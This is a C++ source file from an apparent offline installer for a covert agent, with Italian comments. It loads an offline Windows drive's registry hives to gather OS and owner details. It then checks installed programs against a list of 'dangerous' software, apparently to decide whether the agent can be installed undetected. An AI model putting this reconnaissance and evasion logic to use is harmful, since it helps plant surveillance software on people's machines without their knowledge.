OfflineInstall/Functions_OS_WIN.cpp
#include "stdafx.h"
#include "commons.h"
#include "Functions_OS.h"
#include "Functions_Users.h"
#include "Functions_RCS.h"
BOOL Time1970ToSystemTime(DWORD toffset, SYSTEMTIME *sys_time)
{
SYSTEMTIME age_time_s;
FILETIME age_time_f;
ULARGE_INTEGER nanosec_time, nanosec_offset;
memset(&age_time_s, 0, sizeof(age_time_s));
age_time_s.wDay = 1;
age_time_s.wMonth = 1;
age_time_s.wYear = 1970;
if (!SystemTimeToFileTime(&age_time_s, &age_time_f))
return FALSE;
nanosec_offset.QuadPart = (unsigned int)toffset;
nanosec_offset.QuadPart *= 10000000;
nanosec_time.HighPart = age_time_f.dwHighDateTime;
nanosec_time.LowPart = age_time_f.dwLowDateTime;
nanosec_time.QuadPart += nanosec_offset.QuadPart;
age_time_f.dwHighDateTime = nanosec_time.HighPart;
age_time_f.dwLowDateTime = nanosec_time.LowPart;
return FileTimeToSystemTime(&age_time_f, sys_time);
}
DWORD WIN_GetArch(os_struct_t *os_info)
{
WCHAR wow64_path[MAX_PATH];
HANDLE hfile;
swprintf_s(wow64_path, MAX_PATH, L"%s%s", os_info->drive, L"windows\\syswow64\\");
hfile = CreateFile(wow64_path, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hfile != INVALID_HANDLE_VALUE) {
CloseHandle(hfile);
return 64;
}
return 32;
}
BOOL WIN_IsSupported(os_struct_t *os_info)
{
if ( !wcscmp(os_info->curr_ver, L"5.0") || // Windows 2000
!wcscmp(os_info->curr_ver, L"5.1") || // Windows XP
!wcscmp(os_info->curr_ver, L"5.2") || // Windows 2003
!wcscmp(os_info->curr_ver, L"6.0") || // Windows Vista o 2008
!wcscmp(os_info->curr_ver, L"6.1") || // Windows 7
!wcscmp(os_info->curr_ver, L"6.2") || // Windows 8
!wcscmp(os_info->curr_ver, L"6.3")) // Windows 8.1
return TRUE;
return FALSE;
}
// Se c'e' un software pericoloso torna uno dei seguenti valori
// #define BL_BLACKLISTED 0
// #define BL_SAFE 1
// #define BL_ALLOWSOLDIER 2
DWORD WIN_IsBlackListedSoftware(os_struct_t *os_struct)
{
HKEY hKeyUninstall = NULL, hKeyProgram = NULL;
DWORD dwordval, index, len;
WCHAR stringval[128], product[256];
ULONG uSamDesidered = KEY_READ;
WCHAR software_hive_path[MAX_PATH];
WCHAR system_root[MAX_PATH];
HANDLE hfile;
DWORD i, t_ret;
DWORD ret_val = BL_SAFE;
ZeroMemory(os_struct->bl_software, sizeof(os_struct->bl_software));
// Monta l'hive SOFTWARE
swprintf_s(system_root, MAX_PATH, L"windows\\system32");
swprintf_s(software_hive_path, MAX_PATH, L"%s%s%s", os_struct->drive, system_root, L"\\config\\software");
hfile = CreateFile(software_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE) {
swprintf_s(system_root, MAX_PATH, L"winnt\\system32");
swprintf_s(software_hive_path, MAX_PATH, L"%s%s%s", os_struct->drive, system_root, L"\\config\\software");
hfile = CreateFile(software_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return BL_BLACKLISTED;
}
CloseHandle(hfile);
if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\", software_hive_path) != ERROR_SUCCESS)
return BL_BLACKLISTED;
// Al primo giro guarda quelli a 32 poi quelli a 64bit
for (i=0; i<2 && ret_val != BL_BLACKLISTED; i++) {
do {
index = 0;
if (i == 0) {
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS)
break;
} else {
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS)
break;
}
while(1) {
if(hKeyProgram) {
RegCloseKey(hKeyProgram);
hKeyProgram = NULL;
}
len = sizeof(stringval) / sizeof(stringval[0]);
if(RegEnumKeyExW(hKeyUninstall, index++, stringval, &len, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) break;
if(RegOpenKeyExW(hKeyUninstall, stringval, 0, KEY_READ, &hKeyProgram) != ERROR_SUCCESS) continue;
if(!RegQueryValueExW(hKeyProgram, L"ParentKeyName", NULL, NULL, NULL, NULL)) continue;
len = sizeof(dwordval);
if(!RegQueryValueExW(hKeyProgram, L"SystemComponent", NULL, NULL, (LPBYTE)&dwordval, &len) && (dwordval == 1)) continue;
len = sizeof(stringval);
if(RegQueryValueExW(hKeyProgram, L"DisplayName", NULL, NULL, (LPBYTE)stringval, &len)) continue;
wcsncpy_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE);
len = sizeof(stringval);
if(!RegQueryValueExW(hKeyProgram, L"DisplayVersion", NULL, NULL, (LPBYTE)stringval, &len)) {
wcsncat_s(product, sizeof(product) / sizeof(product[0]), L" (", _TRUNCATE);
wcsncat_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE);
wcsncat_s(product, sizeof(product) / sizeof(product[0]), L")", _TRUNCATE);
}
t_ret = IsDangerousString(product, os_struct);
if (t_ret == BL_ALLOWSOLDIER)
ret_val = BL_ALLOWSOLDIER;
else if (t_ret == BL_BLACKLISTED) {
ret_val = BL_BLACKLISTED;
_snwprintf_s(os_struct->bl_software, sizeof(os_struct->bl_software)/sizeof(os_struct->bl_software[0]), _TRUNCATE, L"%s", product);
break;
}
}
} while(0);
if(hKeyUninstall) {
RegCloseKey(hKeyUninstall);
hKeyUninstall = NULL;
}
}
RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\");
return ret_val;
}
BOOL RecognizeWindowsOS(WCHAR *drive_letter, os_struct_t *os_struct)
{
WCHAR software_hive_path[MAX_PATH];
WCHAR system_hive_path[MAX_PATH];
WCHAR system_root[MAX_PATH];
HANDLE hfile;
DWORD *temp_date;
DWORD *temp_bias;
// Vede se esiste l'hive (XP, Vista, 2000, etc.)
// Cerca prima in \Windows e poi in \WinNT
// Deve trovare sia SYSTEM che SOFTWARE per proseguire
swprintf_s(system_root, MAX_PATH, L"windows\\system32");
swprintf_s(system_hive_path, MAX_PATH, L"%s%s%s", drive_letter, system_root, L"\\config\\system");
hfile = CreateFile(system_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE) {
swprintf_s(system_root, MAX_PATH, L"winnt\\system32");
swprintf_s(system_hive_path, MAX_PATH, L"%s%s%s", drive_letter, system_root, L"\\config\\system");
hfile = CreateFile(system_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
}
CloseHandle(hfile);
swprintf_s(software_hive_path, MAX_PATH, L"%s%s%s", drive_letter, system_root, L"\\config\\software");
hfile = CreateFile(software_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
CloseHandle(hfile);
// Monta l'hive
if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\", system_hive_path) != ERROR_SUCCESS)
return FALSE;
if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\", software_hive_path) != ERROR_SUCCESS) {
RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\");
return FALSE;
}
os_struct->os = WIN_OS;
memcpy(os_struct->system_root, system_root, sizeof(system_root));
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"ProductName", NULL, &(os_struct->product_name));
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"CSDVersion", NULL, &(os_struct->csd_version));
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"RegisteredOwner", NULL, &(os_struct->reg_owner));
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"RegisteredOrganization", NULL, &(os_struct->reg_org));
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"ProductId", NULL, &(os_struct->product_id));
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"CurrentVersion", NULL, &(os_struct->curr_ver));
ReadRegValue(L"RCS_SYSTEM\\ControlSet001\\Control\\ProductOptions", L"ProductType", NULL, &(os_struct->product_type));
ReadRegValue(L"RCS_SYSTEM\\ControlSet001\\Control\\ComputerName\\ComputerName", L"ComputerName", NULL, &(os_struct->computer_name));
ReadRegValue(L"RCS_SYSTEM\\ControlSet001\\Control\\TimeZoneInformation", L"ActiveTimeBias", NULL, (WCHAR **)&temp_bias);
if (temp_bias) {
os_struct->time_bias = *temp_bias;
SAFE_FREE(temp_bias);
} else
os_struct->time_bias = 0;
ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"InstallDate", NULL, (WCHAR **)&temp_date);
if (temp_date) {
Time1970ToSystemTime(*temp_date, &(os_struct->install_date));
SAFE_FREE(temp_date);
}
os_struct->arch = WIN_GetArch(os_struct);
os_struct->is_supported = WIN_IsSupported(os_struct); // Va chiamata per ultima...
RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\");
RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\");
os_struct->is_blacklisted = WIN_IsBlackListedSoftware(os_struct);
return TRUE;
}